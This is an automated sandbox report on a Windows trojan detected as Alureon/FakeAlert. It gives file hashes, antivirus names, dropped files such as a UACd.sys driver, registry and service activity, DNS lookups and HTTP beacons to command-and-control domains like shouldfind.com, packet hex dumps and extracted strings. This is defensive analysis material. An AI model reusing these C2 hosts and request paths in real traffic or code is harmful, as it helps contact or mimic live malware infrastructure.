Analysis Date2013-11-22 01:24:04
MD5dd3e484e14e30b72b023581722cab696
SHA119828fa9ab7e9e6e31847aa71167ebfbc102762b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.itext md5: 71ff1ed14a39267514458176912aec83 sha1: 9ecb93933c3ac7b823a702ddc61c40f747eb58ad size: 12288
Section.lko2l1 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.lko1l1 md5: d72c7eaedacfa026ab5c6e9751cacc5a sha1: e5d1089f71303eacc64ed21a59b6113c16af9f91 size: 69120
Section.idata md5: 6397f853e615d8d55c09cbdc4d34ed17 sha1: f1b7e0e9ec5e9d4213ef838b429341666c1e18d3 size: 2048
Section.rsrc md5: 84567702ed0304b5b8e383a1429ece0d sha1: 40740796861d5dde6e58112a085afd7851e44b64 size: 1024
Timestamp2009-09-02 21:02:15
PEhash4c7f418df6d4c90ba03a0dbc524a7b8b20baf3a8
AVaviraTR/Crypt.XPACK.Gen
AVmsseTrojan:Win32/Alureon.CW
AVavgFakeAlert.MN
AVmcafeeFakeAlert-IC

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\UAC2af3.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\UAC2b31.tmp
Starts Servicespooler

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates Fileglobalroot\systemroot\system32\UACxxomfrgfhq.log
Creates ProcessC:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1112

Process
↳ Pid 1212

Process
↳ Pid 1848

Process
↳ Pid 1160

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝
NULL
Creates FileWMIDataDevice
Creates Fileglobalroot\systemroot\system32\drivers\UACd.sys

Process
↳ C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

Creates FilePIPE\lsarpc

Network Details:

DNSshouldfind.com
Type: A
209.222.14.3
DNSperlineportal.com
Type: A
208.73.210.29
DNSbelowsearch.com
Type: A
209.222.14.3
DNSonline4stats.org
Type: A
DNSonline4traffic.org
Type: A
DNSpowerfulstat.com
Type: A
DNSwebmobilesearch.net
Type: A
DNStlcstatistic.com
Type: A
DNStraffic4stats.org
Type: A
HTTP GEThttp://shouldfind.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://perlineportal.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://shouldfind.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://belowsearch.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1032 ➝ 208.73.210.29:80
Flows TCP192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2073686f 756c6466 696e642e 636f6d0d    shouldfind.com.
0x00000090 (00144)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000a0 (00160)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2073686f 756c6466 696e642e 636f6d0d    shouldfind.com.
0x00000090 (00144)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000a0 (00160)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2062656c 6f777365 61726368 2e636f6d    belowsearch.com
0x00000090 (00144)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x000000a0 (00160)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   20706572 6c696e65 706f7274 616c2e63    perlineportal.c
0x00000090 (00144)   6f6d0d0a 50726167 6d613a20 6e6f2d63   om..Pragma: no-c
0x000000a0 (00160)   61636865 0d0a0d0a                     ache....


Strings
FQPK
0JVr=|d
'0lY0-
1DR.s+
4^Lusg
4xav"m
5dq0<C
5Okp"W-
67)gy9h
6cu@	8
7Dt.E}
>7Yjp2G
 &-8IhM
8	PAD<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><ms_asmv2:trustInfo xmlns:ms_asmv2="urn:schemas-microsoft-com:asm.v2"><ms_asmv2:security><ms_asmv2:requestedPrivileges><ms_asmv2:requestedExecutionLevel level="requireAdministrator"></ms_asmv2:requestedExecutionLevel></ms_asmv2:requestedPrivileges></ms_asmv2:security></ms_asmv2:trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
8U#Y}lR7
?90zg7
9*-C%c\|
.;a> !
abpvkv
)Aib>0
A@jVcLk
AoaB&1|4
B2!8le
bsyopgiva.dll
[BZxOe .q
c^p-dR
CreateLlrdodcd
D2r2(`
d:Ds:?^
DestroyCaret
dM;Gzp(
E^QK>j
?ERS:"
ExitProcess
F	J^5@W
F'<k[g
G1|_3"
g6w_*2"
GetActiveWindow
GetCurrentProcess
GetProcAddress
GetWindowLongW
GFL=8U
!Gs|4T
HOH5c$
h!)R(&x:
i'^ax4
@.idata
}i$<DCn0
iGh(Lk
.itext
	j(A5"B@
JI"]^F+
:k{9J.
Keb%?:U
kernel32.dll
kG^5#S
Kmvrofsgxy
kpa7wG9Gc
KP=cIA*
Kv)8`TU
(,kVM\
K}zgFY
<l9{_+mY
LH'4r:
lj=r!Q
:l~@Kcv)
@.lko1l1
`.lko2l1
LlEAlK
lphT<Y
L"qcrs"
l@'V	?CX-
%l,Y_B8T
{M#&8x
-!MAn&
m{u'Yh
?n2'v'"
.N7GBT
NA5a"H
	n!?fP
nftxf=
N)	HE7a
&NK6rl
ntdll.dll
o}_C~mN6O
oRhiJ$I
P~3b&O
Pg *<>V(
`PH$DH
q,K=_5Z
R6XpbN
r.HAy(
Ri;CCmB
SetNamedPipeHandleState
s~hM!m[xD
s>?j#i
sQ};iUr+
ssz8yr
S^zzP^
(>!T;]
t <7.yY
td66_P<r
td8=CF
`T|g[@f
!This program cannot be run in DOS mode.
$toRwZ@P
TS j>?
?TWcRF
TY<Y6w
\U8nU;
u{_Aj-y
u$<|Bk
u,Rxnyw
user32.dll
UY#=y:
V]9%S^
VirtualProtectEx
	]Vlo['
VPqKG-
V`VP1A
!w02Q!<
w"""6]
?wanLP%f
*Wb\mnc
W/rD/)S
wTM9XJ
Xq:){R%
+~XQ,w
XVA[K7#
YATLmV
`yjgPU
y?L_0H
y!QGKm!,
Y'Y[nNS
Z0A@}F
!z6	;Yr
ZdBr=}p]
.ZoRG@|
Z&qbe+v
Z{VVg}
ZZUr[k@